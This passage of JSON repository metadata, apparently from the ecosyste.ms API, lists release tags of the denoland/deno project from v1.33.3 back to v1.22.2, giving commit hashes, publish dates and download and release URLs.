ag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/